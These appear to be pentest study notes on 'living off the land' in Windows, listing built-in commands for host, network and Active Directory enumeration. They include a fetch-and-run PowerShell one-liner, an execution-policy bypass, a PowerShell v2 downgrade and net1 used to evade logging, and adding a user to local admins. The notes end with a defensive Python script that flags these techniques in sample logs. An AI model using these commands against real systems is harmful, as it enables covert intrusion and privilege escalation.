13. Living Off the Land

Key Concepts:

  • Stealth: Using built-in tools reduces the risk of detection.

  • Limited Resources: Assumes a managed host with no internet access or ability to upload tools.

  • Log Evasion: Techniques like downgrading PowerShell are explored.


1. Basic Enumeration Commands (CMD)

hostname                          # Prints the PC's name
[System.Environment]::OSVersion.Version  # Prints the OS version (PowerShell syntax, not cmd; use "ver" in cmd)
wmic qfe get Caption,Description,HotFixID,InstalledOn  # Prints installed patches
ipconfig /all                     # Displays network adapter configurations
set                                # Lists environment variables
echo %USERDOMAIN%                  # Displays the domain name
echo %logonserver%                 # Prints the domain controller name
systeminfo                         # Provides a summary of host information

2. PowerShell Enumeration

Get-Module                          # Lists loaded modules
Get-ExecutionPolicy -List           # Prints execution policy settings
Set-ExecutionPolicy Bypass -Scope Process  # Bypasses execution policy for the current process
Get-ChildItem Env: | ft Key,Value    # Returns environment variables
Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt  # Retrieves PowerShell history
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL'); <commands>"  # Downloads a script from a URL as a string and runs it with Invoke-Expression (iex)
powershell.exe -version 2           # Downgrades PowerShell to version 2
Get-MpComputerStatus                # Retrieves Windows Defender status
qwinsta                              # Lists active sessions

3. Network Enumeration

arp -a                               # Lists ARP table entries
route print                          # Displays the routing table
netsh advfirewall show allprofiles   # Displays firewall settings

4. Windows Management Instrumentation (WMI)

wmic qfe get Caption,Description,HotFixID,InstalledOn  # Prints patch information
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List  # Displays host information
wmic process list /format:list  # Lists running processes
wmic ntdomain list /format:list  # Displays domain information
wmic useraccount list /format:list  # Lists user accounts
wmic group list /format:list  # Lists local groups
wmic sysaccount list /format:list  # Dumps service account information

5. Net Commands

net accounts                      # Displays password requirements
net accounts /domain              # Displays domain password policy
net group /domain                 # Lists domain groups
net group "Domain Admins" /domain  # Lists domain admin users
net group "domain computers" /domain  # Lists domain computers
net group "Domain Controllers" /domain  # Lists domain controllers
net group <domain_group_name> /domain  # Lists users in a group
net groups /domain                # Lists domain groups
net localgroup                     # Lists local groups
net localgroup administrators /domain  # Lists members of the Administrators group on the domain controller
net localgroup Administrators      # Lists members of the local Administrators group
net localgroup administrators [username] /add  # Adds a user to the administrators group
net share                          # Lists shared resources
net user <ACCOUNT_NAME> /domain    # Displays user information
net user /domain                   # Lists domain users
net user %username%                # Displays current user information
net use x: \\computer\share         # Mounts a share
net view                           # Lists network computers
net view /all /domain[:domainname]  # Lists domain shares
net view \\computer /ALL            # Lists computer shares
net view /domain                   # Lists domain PCs
net1                                # A less monitored version of net

6. Dsquery Enumeration

dsquery user         # Lists domain users
dsquery computer     # Lists domain computers

Key Takeaways

  • Windows provides numerous built-in tools for AD enumeration.

  • PowerShell is a powerful tool for both host and network reconnaissance.

  • WMI and net commands offer extensive domain information.

  • Dsquery is extremely useful for querying Active Directory.

  • Downgrading PowerShell can hinder logging.

  • net1 can be used to bypass some monitoring systems.
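The last two takeaways are the ones a defender wants telemetry for. The following is an added example, not part of these notes: a small Python triage over constructed records shaped like Windows PowerShell log Event 400 (engine lifecycle, where a v2 engine started from a v5 host shows EngineVersion lower than HostVersion) and Security Event 4688 (process creation, where net1.exe and an explicit "-version 2" are visible on the command line). The event shapes follow the real logs; the sample messages themselves are made up.

```python
import re

# Constructed sample records (not real logs) in the shape of Windows PowerShell
# log Event 400 and Security Event 4688.
SAMPLE_EVENTS = [
    {"log": "Windows PowerShell", "id": 400, "message": "Engine state is changed from None to Available.\n\tHostVersion=5.1.19041.1\n\tEngineVersion=5.1.19041.1"},
    {"log": "Windows PowerShell", "id": 400, "message": "Engine state is changed from None to Available.\n\tHostVersion=5.1.19041.1\n\tEngineVersion=2.0"},
    {"log": "Security", "id": 4688, "message": "New Process Name: C:\\Windows\\System32\\net1.exe\nProcess Command Line: net1 group \"Domain Admins\" /domain"},
    {"log": "Security", "id": 4688, "message": "New Process Name: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nProcess Command Line: powershell.exe -version 2 -nop"},
    {"log": "Security", "id": 4688, "message": "New Process Name: C:\\Windows\\System32\\net.exe\nProcess Command Line: net share"},
]

_VERSION_RE = re.compile(r"(Host|Engine)Version=(\d+)\.(\d+)")
# powershell.exe accepts -Version and its prefix abbreviation -v
_DOWNGRADE_ARG_RE = re.compile(r"(?i)(?:^|\s)-v(?:ersion)?\s+2(?:\.0)?(?:\s|$)")

def check_engine_downgrade(message):
    """Event 400: engine major version below host major version means a
    newer PowerShell host started an old (v2) engine."""
    versions = {m.group(1): int(m.group(2)) for m in _VERSION_RE.finditer(message)}
    if "Host" in versions and "Engine" in versions:
        return versions["Engine"] < versions["Host"]
    return False

def check_process(message):
    """Event 4688: flag net1.exe use and an explicit v2 request on the command line."""
    findings = []
    name = re.search(r"New Process Name:\s*(.+)", message)
    cmd = re.search(r"Process Command Line:\s*(.+)", message)
    if name and name.group(1).lower().endswith("\\net1.exe"):
        findings.append("net1 used instead of net")
    if cmd and _DOWNGRADE_ARG_RE.search(cmd.group(1)):
        findings.append("PowerShell v2 requested on command line")
    return findings

def triage(events):
    """Return (event index, finding) pairs for the events worth a closer look."""
    alerts = []
    for i, ev in enumerate(events):
        if ev["id"] == 400 and check_engine_downgrade(ev["message"]):
            alerts.append((i, "PowerShell engine downgrade"))
        elif ev["id"] == 4688:
            alerts.extend((i, f) for f in check_process(ev["message"]))
    return alerts

if __name__ == "__main__":
    for idx, finding in triage(SAMPLE_EVENTS):
        print(idx, finding)
```

On a real host the same checks run over Get-WinEvent output from the "Windows PowerShell" and Security logs; 4688 only carries the command line if "Include command line in process creation events" is enabled.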